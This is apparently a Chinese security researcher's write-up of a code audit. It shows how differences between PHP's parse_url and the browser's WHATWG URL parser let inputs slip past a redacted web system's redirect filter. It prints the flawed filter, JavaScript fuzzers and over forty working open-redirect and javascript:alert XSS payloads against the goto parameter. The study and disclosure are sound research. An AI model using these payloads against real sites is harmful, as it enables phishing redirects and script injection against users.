2022年8月份在挖天融信SRC的时候,发现天融信的某个站点使用了redacted系统,于是便在github上下载了redacted的源码,审计了一下。
Source & Sink
通过审计发现,redacted系统在多处使用goto 参数来实现页面的重定向,比如说登录功能:
http://demo.redacted.com/login?goto=/
已经登录的用户如果访问该URL,后端将会读取goto参数的值,将其填充到twig模板中的div标签的自定义属性data-goto
中:
{% block content %}
<div id="page-message-container" class="page-message-container" data-goto="{{ goto }}" data-duration={{ duration }}>
<div class="page-message-panel">
<div class="page-message-heading">
<h2 class="page-message-title">{{ title|trans }}</h2>
</div>
<div class="page-message-body">{{ message|default('')|trans|raw }}</div>
</div>
</div>
{% endblock %}
之后前端通过如下js代码读取data-goto属性的值,通过window.location.href
实现页面的跳转:
function (e, t) {
var n = $("#page-message-container"),
r = n.data("goto"),
o = n.data("duration");
o > 0 && r && setTimeout((function () {
window.location.href = r
}), o)
}
Sanitizer/Filter
redacted为了防止在页面重定向的过程中出现开放重定向漏洞(OR)和XSS ,专门在后端写了一个过滤器,对goto参数中的URL进行过滤:
/**
* 过滤URL.
*
* 如果url不属于非本站域名下的,则返回本站首页地址。
*
* @param $url string 待过滤的$url
*
* @return string
*/
public function filterRedirectUrl($url)
{
$host = $this->get('request_stack')->getCurrentRequest()->getHost();
$safeHosts = [$host];
$parsedUrl = parse_url($url);
$isUnsafeHost = isset($parsedUrl['host']) && !in_array($parsedUrl['host'], $safeHosts);
$isInvalidUrl = isset($parsedUrl['scheme']) && !in_array($parsedUrl['scheme'], ['http', 'https']);
if (empty($url) || $isUnsafeHost || $isInvalidUrl) {
$url = $this->generateUrl('homepage', [], UrlGeneratorInterface::ABSOLUTE_URL);
}
return strip_tags($url);
}
该 filter 的工作机制大致如下:
1. 拿到http请求报文中Host请求头,作为host白名单
2. 设置协议白名单: http,https
3. 使用PHP的URL解析器,来解析传入的URL,得到host部分和scheme部分
4. 如果host部分和scheme部分存在,就判断host部分是否属于host白名单,scheme部分是否属于scheme白名单
5. 否则就认为用户传入的是一个相对URL
绕过host检查
如何绕过filter的host检查呢?
我想到了之前用来绕过 SSRF filter 的一个payload :
https://demo.redacted.com/login?goto=http://baidu.com\@demo.redacted.com/
这段payload 之所以可以成功,主要是利用了前后端URL解析器的不一致性:
- PHP的
parse_url
认为URL的host部分是demo.redacted.com ,与http请求报文中Host请求一致,所以通过了检查, - 但是js的URL解析器却并不这样认为: js 的URL解析器会将
\
规范化为/
,所以原来的payload 经过解析后就变成了:
http://baidu.com/@demo.redacted.com/
因此前端认为URL的host部分是baidu.com 。
> new URL('http://baidu.com\\@demo.redacted.com/')
URL {origin: 'http://baidu.com', protocol: 'http:', username: '', password: '', host: 'baidu.com', …}
hash: ""
host: "baidu.com"
hostname: "baidu.com"
href: "http://baidu.com/@demo.redacted.com/"
origin: "http://baidu.com"
password: ""
pathname: "/@demo.redacted.com/"
port: ""
protocol: "http:"
search: ""
searchParams: URLSearchParams {}
username: ""
绕过scheme检查
仅仅绕过host检查,我们只能造成一个开放重定向漏洞,想要造成xss,还需要绕过后端的协议检查,如何绕过后端的协议检查呢?
我们可以尝试从如下思路来切入:因为漏洞的出现往往是由于程序的一些错误假设,所以我们可以尝试去寻找一下filter 有哪些错误的假设,然后尝试去打破它。
$parsedUrl = parse_url($url);
$isUnsafeHost = isset($parsedUrl['host']) && ! in_array($parsedUrl['host'], $safeHosts);
$isInvalidUrl = isset($parsedUrl['scheme']) && ! in_array($parsedUrl['scheme'], ['http', 'https']);
if (empty($url) || $isUnsafeHost || $isInvalidUrl) {
$url = $this->generateUrl('homepage', [], UrlGeneratorInterface::ABSOLUTE_URL);
}
return strip_tags($url);
再次回看上面的那段filter代码,filter 假设:
1. 如果从URL中解析不到 host 和 scheme 部分,就一定是相对URL
2. "相对URL"一定就是安全的。
那么如果我们让parse_url返回false会怎么样?
false['host'] === NULL
false['scheme'] === NULL
parse_url 会认为用户传入的URL没有host和scheme部分,所以是一个相对URL!而相对URL一定是安全的,可以直接返回给前端。
如何让parse_url返回false呢?
PHP URL parser 只是对RFC标准的实现,所以一旦传入的URL不符合RFC规范,那么parse_url就会返回false
比如一个经典的payload ,便可以用一种更简单的方式造成开放重定向:
https://demo.redacted.com/login?goto=http:///baidu.com
RFC 1738 规定:层级结构的绝对URL 除去协议部分,后续部分必须以 // 开头
The scheme specific data start with a double slash "//" to indicate that it complies with the common Internet scheme syntax.
所以PHP 的URL解析器认为 http:///baidu.com 是一个非法的URL,因此直接返回了false,所以直接跳过了后续检查,返回给了前端。
但是前端的URL解析器并不这么认为,它会将http:///baidu.com 规范化为http://baidu.com :
> new URL('http:///baidu.com')
URL {origin: 'http://baidu.com', protocol: 'http:', username: '', password: '', host: 'baidu.com', …}
hash: ""
host: "baidu.com"
hostname: "baidu.com"
href: "http://baidu.com/"
origin: "http://baidu.com"
password: ""
pathname: "/"
port: ""
protocol: "http:"
search: ""
searchParams: URLSearchParams {}
username: ""
所以造成了OR 漏洞。
那么如果将http协议换成javascript 协议呢?RFC文档只是规定了层级URL必须包含//
前缀,却没有明确说明: 如果非层级URL包含//
前缀,URL解析器应该如何处理。
javascript:alert(1)
javascript://alert(1)
mailto:happyhacking@qq.com
mailto://happyhacking@qq.com
于是我便想到了如下payload:
https://demo.redacted.com/login?goto=javascript:///%250dalert(1)
PHP 的URL解析器认为 javascript:///%250dalert(1)
是一个非法URL,直接返回了false,所以filter 跳过了协议检查,直接认为这就是一个安全的”相对URL“ 。
但是前端的URL解析器有自己的想法:
这行payload 反射到前端后是这样的:
window.location.href = 'javascript:///%0dalert(1)'
前端的URL解析器先进行URL解码,将%0d
解码为\n
,解析到的协议名为javascript,因此切换为了js 解析器,js 解析器则认为//
是单行注释符,alert(1) 是换行后的下一行js代码。
因此造成了XSS
进一步的研究
能不能通过编写fuzzer来进一步搜索到js URL解析器和php URL解析器的更多不一致性呢?
http:{char}//localhost:80/xxxx
我们能否在 http:
和 //
之间找到一个字符,将该字符填充到{char}位置之后,前端URL解析器仍然认为URL的host部分是localhost呢?
fuzzer如下:
log=[];
for(i=0;i<0x10ffff;i++){
try{
let url = new URL('http:'+String.fromCodePoint(i)+'//localhost:80/xxxx')
if(url['host'] == 'localhost' ){
console.log(i+':URL encoded i : '+encodeURI(String.fromCodePoint(i)))
log.push(i);
}
}catch(e){}
}
log
前端URL解析器的运行结果:
9: URL encoded i : %09 debugger eval code:7:13-> \t http:%09//localhost
10: URL encoded i : %0A debugger eval code:7:13-> http:%0a//localhost
13: URL encoded i : %0D debugger eval code:7:13-> http:%0d//localhost
47: URL encoded i : / debugger eval code:7:13 -> http:///localhost
92: URL encoded i : %5C \ -> http:\//localhost
那么PHP的URL解析器是如何解析的呢?
["http:%09//localhost"]=>
array(2) {
["scheme"]=>
string(4) "http"
["path"]=>
string(14) "%09//localhost"
}
["http: //localhost"]=>
array(2) {
["scheme"]=>
string(4) "http"
["path"]=>
string(14) " //localhost"
}
["http:%0a//localhost"]=>
array(2) {
["scheme"]=>
string(4) "http"
["path"]=>
string(14) "%0a//localhost"
}
["http:\//localhost"]=>
array(2) {
["scheme"]=>
string(4) "http"
["path"]=>
string(12) "\//localhost"
}
["http:///localhost"]=>
bool(false)
由此可见,PHP URL解析器面对这些payload的时候,要么会认为http:
之后的都是path部分,要么直接认为该URL是一个非法的URL,从而返回了false
换句话说,以下payload 也可以绕过redacted 的filter ,导致开放重定向:
https://demo.redacted.com/login?goto=http:\//www.baidu.com
https://demo.redacted.com/login?goto=http:%0d\\www.baidu.com
https://demo.redacted.com/login?goto=http:%0a\\www.baidu.com
https://demo.redacted.com/login?goto=http:%09\\www.baidu.com
http{char}://localhost:80/xxxx
我们能否在 http
和 ://
之间找到一个字符,加入该字符后仍然可以让前端URL解析器认为URL的host部分是localhost且scheme部分是http呢?
fuzzer:
log=[];
for(i=0;i<0x10ffff;i++){
try{
let url = new URL('http'+String.fromCodePoint(i)+'://localhost:80/xxxx')
if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
console.log('i: '+i+' URL encoded i : '+encodeURI(String.fromCodePoint(i)));
console.log(url);
log.push(i);
}
}catch(e){}
}
log
前端URL解析器的运行结果:
VM437:7 9: URL encoded i : %09
VM437:7 10: URL encoded i : %0A
VM437:7 13: URL encoded i : %0D
这次只得到了三个字符,没有了 / 和 ,得到如下3个payload
http%09://baidu.com
http%0a://baidu.com
http%0d://baidu.com
PHP的URL解析器是如何解析的呢?
["http%09://localhost:80/xxx"]=>
array(1) {
["path"]=>
string(26) "http%09://localhost:80/xxx"
}
["http%0a://localhost:80/xxx"]=>
array(1) {
["path"]=>
string(26) "http%0a://localhost:80/xxx"
}
["http%0d://localhost:80/xxx"]=>
array(1) {
["path"]=>
string(26) "http%0d://localhost:80/xxx"
}
PHP 直接认为整个URL 都是path 部分,即认为整个URL就是一个相对URL
这样一来,同时绕过了filter的协议检查和host检查:
window.location.href='http\n://localhost:80/xxx' //成功!
window.location.href='javascript\n:alert(1)' //成功!
window.location.href='javascript\r:alert(1)' //成功!
window.location.href='javascript\t:alert(1)' //成功!
payload:
https://demo.redacted.com/login?goto=javascript%0d:alert(1) //成功!
https://demo.redacted.com/login?goto=javascript%0a:alert(1) //成功!
https://demo.redacted.com/login?goto=javascript%09:alert(1) //成功!
https://demo.redacted.com/login?goto=http%09://baidu.com //成功
{char}http://localhost:80/xxxx
能否在 http
协议之前找到一个字符,填充进去后,仍然可以让前端URL解析器认为URL的host部分是localhost且scheme部分是http呢?
log=[];
for(i=0;i<0x10ffff;i++){
try{
let url = new URL(String.fromCodePoint(i)+'http://localhost:80/xxxx')
if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
console.log(`i: ${i} ,URL encoded i : `+encodeURI(String.fromCodePoint(i))+' string begin:'+String.fromCodePoint(i)+'string end')
log.push(i);
}
}catch(e){}
}
log
log.forEach(i=>{
//console.log(encodeURI(String.fromCodePoint(i))+'http://localhost:80/xxxx')
console.log(encodeURI(String.fromCodePoint(i))+'javascript:alert(1)')
})
生成了如下payload:
%00http://localhost:80/xxxx
%01http://localhost:80/xxxx
%02http://localhost:80/xxxx
%03http://localhost:80/xxxx
%04http://localhost:80/xxxx
%05http://localhost:80/xxxx
%06http://localhost:80/xxxx
%07http://localhost:80/xxxx
%08http://localhost:80/xxxx
%09http://localhost:80/xxxx
%0Ahttp://localhost:80/xxxx
%0Bhttp://localhost:80/xxxx
%0Chttp://localhost:80/xxxx
%0Dhttp://localhost:80/xxxx
%0Ehttp://localhost:80/xxxx
%0Fhttp://localhost:80/xxxx
%10http://localhost:80/xxxx
%11http://localhost:80/xxxx
%12http://localhost:80/xxxx
%13http://localhost:80/xxxx
%14http://localhost:80/xxxx
%15http://localhost:80/xxxx
%16http://localhost:80/xxxx
%17http://localhost:80/xxxx
%18http://localhost:80/xxxx
%19http://localhost:80/xxxx
%1Ahttp://localhost:80/xxxx
%1Bhttp://localhost:80/xxxx
%1Chttp://localhost:80/xxxx
%1Dhttp://localhost:80/xxxx
%1Ehttp://localhost:80/xxxx
%1Fhttp://localhost:80/xxxx
%20http://localhost:80/xxxx
将http协议替换为javascript协议:
%00javascript:alert(1)
%01javascript:alert(1)
%02javascript:alert(1)
%03javascript:alert(1)
%04javascript:alert(1)
%05javascript:alert(1)
%06javascript:alert(1)
%07javascript:alert(1)
%08javascript:alert(1)
%09javascript:alert(1)
%0Ajavascript:alert(1)
%0Bjavascript:alert(1)
%0Cjavascript:alert(1)
%0Djavascript:alert(1)
%0Ejavascript:alert(1)
%0Fjavascript:alert(1)
%10javascript:alert(1)
%11javascript:alert(1)
%12javascript:alert(1)
%13javascript:alert(1)
%14javascript:alert(1)
%15javascript:alert(1)
%16javascript:alert(1)
%17javascript:alert(1)
%18javascript:alert(1)
%19javascript:alert(1)
%1Ajavascript:alert(1)
%1Bjavascript:alert(1)
%1Cjavascript:alert(1)
%1Djavascript:alert(1)
%1Ejavascript:alert(1)
%1Fjavascript:alert(1)
%20javascript:alert(1)
PHP 的URL解析器是如何解析的呢?
["%00http://localhost:80/xxxx"]=>
array(1) {
["path"]=>
string(27) "%00http://localhost:80/xxxx"
}
["%01http://localhost:80/xxxx"]=>
array(1) {
["path"]=>
string(27) "%01http://localhost:80/xxxx"
}
["%1Djavascript:alert(1)"]=>
array(1) {
["path"]=>
string(22) "%1Djavascript:alert(1)"
}
["%1Ejavascript:alert(1)"]=>
array(1) {
["path"]=>
string(22) "%1Ejavascript:alert(1)"
}
PHP 的URL解析器认为整个URL就是一个相对URL
所以以下payload 都可以绕过redacted filter 的协议检查和host检查:
https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
https://demo.redacted.com/login?goto=%03javascript:alert(1)
https://demo.redacted.com/login?goto=%04javascript:alert(1)
https://demo.redacted.com/login?goto=%05javascript:alert(1)
https://demo.redacted.com/login?goto=%06javascript:alert(1)
https://demo.redacted.com/login?goto=%07javascript:alert(1)
https://demo.redacted.com/login?goto=%08javascript:alert(1)
https://demo.redacted.com/login?goto=%09javascript:alert(1)
https://demo.redacted.com/login?goto=%0Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%0Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Djavascript:alert(1)
https://demo.redacted.com/login?goto=%0Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%0Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%10javascript:alert(1)
https://demo.redacted.com/login?goto=%11javascript:alert(1)
https://demo.redacted.com/login?goto=%12javascript:alert(1)
https://demo.redacted.com/login?goto=%13javascript:alert(1)
https://demo.redacted.com/login?goto=%14javascript:alert(1)
https://demo.redacted.com/login?goto=%15javascript:alert(1)
https://demo.redacted.com/login?goto=%16javascript:alert(1)
https://demo.redacted.com/login?goto=%17javascript:alert(1)
https://demo.redacted.com/login?goto=%18javascript:alert(1)
https://demo.redacted.com/login?goto=%19javascript:alert(1)
https://demo.redacted.com/login?goto=%1Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%1Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Djavascript:alert(1)
https://demo.redacted.com/login?goto=%1Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%1Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%20javascript:alert(1)
ht{char}tp://localhost:80/xxxx
让我们的想法再大胆一点,能否在ht
和tp
之间找到一种字符,让前端的URL解析器仍然认为URL的scheme部分是http
且host部分是localhost
fuzz 程序如下:
log=[];
for(i=0;i<0x10ffff;i++){
try{
let url = new URL('ht'+String.fromCodePoint(i)+'tp://localhost:80/xxxx')
if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
console.log('i: '+i+' URL encoded i : '+encodeURI(String.fromCodePoint(i)));
console.log(url);
log.push(i);
}
}catch(e){}
}
log
运行结果:
i: 9 URL encoded i : %09 debugger eval code:6:13
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
debugger eval code:7:13
i: 10 URL encoded i : %0A debugger eval code:6:13
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
debugger eval code:7:13
i: 13 URL encoded i : %0D debugger eval code:6:13
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
debugger eval code:7:13
Array(3) [ 9, 10, 13 ]
得到了如下payload
ht%0dtp://localhost
ht%0atp://localhost
ht%09tp://localhost
java%09script:alert(1)
java%0dscript:alert(1)
java%0ascript:alert(1)
那么PHP的URL解析器是如何处理这些畸形URL的呢?
["ht%0dtp://localhost"]=>
array(1) {
["path"]=>
string(19) "ht%0dtp://localhost"
}
["ht%0atp://localhost"]=>
array(1) {
["path"]=>
string(19) "ht%0atp://localhost"
}
["ht%09tp://localhost"]=>
array(1) {
["path"]=>
string(19) "ht%09tp://localhost"
}
["java%09script:alert(1)"]=>
array(1) {
["path"]=>
string(22) "java%09script:alert(1)"
}
["java%0dscript:alert(1)"]=>
array(1) {
["path"]=>
string(22) "java%0dscript:alert(1)"
}
["java%0ascript:alert(1)"]=>
array(1) {
["path"]=>
string(22) "java%0ascript:alert(1)"
}
PHP 的URL解析器再一次地认为这些URL都是'规范的'相对URL,全部通过了redacted fitler的检查
https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
实际上这三种字符可以放在scheme的任意位置:
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)
汇总
通过对javascript URL parser 与php URL parser不一致性的进一步研究,我一共找到了四十几种绕过redacted filter 的方法:
https://demo.redacted.com/login?goto=http://baidu.com\@demo.redacted.com/
https://demo.redacted.com/login?goto=javascript:///%250dalert(1)
https://demo.redacted.com/login?goto=http:///www.baidu.com
https://demo.redacted.com/login?goto=http:\//www.baidu.com
https://demo.redacted.com/login?goto=http:%0d\\www.baidu.com
https://demo.redacted.com/login?goto=http:%0a\\www.baidu.com
https://demo.redacted.com/login?goto=http:%09\\www.baidu.com
https://demo.redacted.com/login?goto=javascript%0d:alert(1)
https://demo.redacted.com/login?goto=javascript%0a:alert(1)
https://demo.redacted.com/login?goto=javascript%09:alert(1)
https://demo.redacted.com/login?goto=http%09://baidu.com
https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
https://demo.redacted.com/login?goto=%03javascript:alert(1)
https://demo.redacted.com/login?goto=%04javascript:alert(1)
https://demo.redacted.com/login?goto=%05javascript:alert(1)
https://demo.redacted.com/login?goto=%06javascript:alert(1)
https://demo.redacted.com/login?goto=%07javascript:alert(1)
https://demo.redacted.com/login?goto=%08javascript:alert(1)
https://demo.redacted.com/login?goto=%09javascript:alert(1)
https://demo.redacted.com/login?goto=%0Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%0Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Djavascript:alert(1)
https://demo.redacted.com/login?goto=%0Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%0Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%10javascript:alert(1)
https://demo.redacted.com/login?goto=%11javascript:alert(1)
https://demo.redacted.com/login?goto=%12javascript:alert(1)
https://demo.redacted.com/login?goto=%13javascript:alert(1)
https://demo.redacted.com/login?goto=%14javascript:alert(1)
https://demo.redacted.com/login?goto=%15javascript:alert(1)
https://demo.redacted.com/login?goto=%16javascript:alert(1)
https://demo.redacted.com/login?goto=%17javascript:alert(1)
https://demo.redacted.com/login?goto=%18javascript:alert(1)
https://demo.redacted.com/login?goto=%19javascript:alert(1)
https://demo.redacted.com/login?goto=%1Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%1Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Djavascript:alert(1)
https://demo.redacted.com/login?goto=%1Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%1Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%20javascript:alert(1)
https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)
根本原因
为什么javascript URL parser与PHP URL parser之间存在这么大的不一致性?
因为这个世界上存在两种URL解析标准:RFC标准和WHATWG标准,WHATWG 组织在参考
RFC标准的基础上,自己制定了一套标准: URL parsing
浏览器端javascript URL parser遵循了WHATWG标准,而PHP URL parser 遵循了RFC规范, Node.js 则同时提供了两种URL解析器,分别是 url.parse
和 new URL
,前者遵循RFC标准,后者遵循WHATWG标准。
WHATWG URL parsing 标准中规定:
- If input contains any leading or trailing C0 control or space, validation error.
- Remove any leading and trailing C0 control or space from input.
如果输入的URL开头和结尾有C0 控制符和space,则报一个 validtion error,然后删除输入中给所有开头和结尾的 C0 控制符 和 space ,其中 C0 control 的范围是: 0x00-0x1F ,space 的范围是 0x20 ,所以C0 control + space的范围是 0x00-0x20
什么叫 validation error 呢?
A validation error indicates a mismatch between input and valid input. User agents, especially conformance checkers, are encouraged to report them somewhere.A validation error does not mean that the parser terminates. Termination of a parser is always stated explicitly, e.g., through a return statement.
validtion error 只是表示输入和有效输入之间的不匹配,并不意味着解析终止,标准鼓励实现者在某处报告它。
这就是为什么以下这些payload可以工作:
https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
...
https://demo.redacted.com/login?goto=%20javascript:alert(1)
该标准还规定:
- If input contains any ASCII tab or newline, validation error.
- Remove all ASCII tab or newline from input.
那么ASCII tab or newline 范围有多大?
An ASCII tab or newline is U+0009 TAB, U+000A LF, or U+000D CR.
所以下面这些payload中%0d %0a %09都会被javascript URL parser给删除掉
https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)
换句话说,%0d %0a %09 这三个字符可以放在URL的任何位置来对URL进行混淆,反正javascript URL parser 会删除掉这些字符,比如
new URL('http:/\x09/baidu.com')
URL {
origin: 'http://baidu.com',
protocol: 'http:',
username: '',
password: '',
host: 'baidu.com'
}
总结
世界上最糟糕的事莫过于对于同一事物有两套标准,如果标准存在不一致性,那么实现必然存在不一致性。不一致性导致的安全问题是隐蔽的,因为当你审计单个系统的时候,你会认为没有安全问题,但是当你把多个系统连接起来协同工作的时候,安全问题就会出现。这也说明了审计安全问题,需要从全局出发来统筹考虑,不能只是审计单个系统。
同时值得注意的是,凡是标准和规范没有明确规定或者模棱两可的地方,实现标准的开发者之间就会存在理解偏差,进而导致各种遵循标准实现的语言、库、框架、软件之间出现不一致性,这种不一致性便是创造新的攻击技术的沃土。
+----------------------------------------------------+
| 存在两套标准/标准的模棱两可/标准没有明确规定/标准的不同版本 |
+----------------------------------------------------+
|
v
+-------------------+
| 实现的不一致性 |
+-------------------+
|
v
+------------------------------------+
| 各种bypass trick/新的攻击技术 |
+------------------------------------+
参考资料
- whatwg - C0 control 标准
- whatwg - URL parsing 标准
- whatwg - validation error
- A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!
- EXPLOITING URL PARSERS: THE GOOD, BAD, AND INCONSISTENT
- HOW FRCKN' HARD IS IT TO UNDERSTAND A URL?! - uXSS CVE-2018-6128
- How did Masato find the Google Search XSS?
- Fuzzing Browsers for weird XSS Vectors
- 2017/Daniel Stenberg/ONE URL STANDARD PLEASE
- 2022/Daniel Stenberg/DON’T MIX URL PARSERS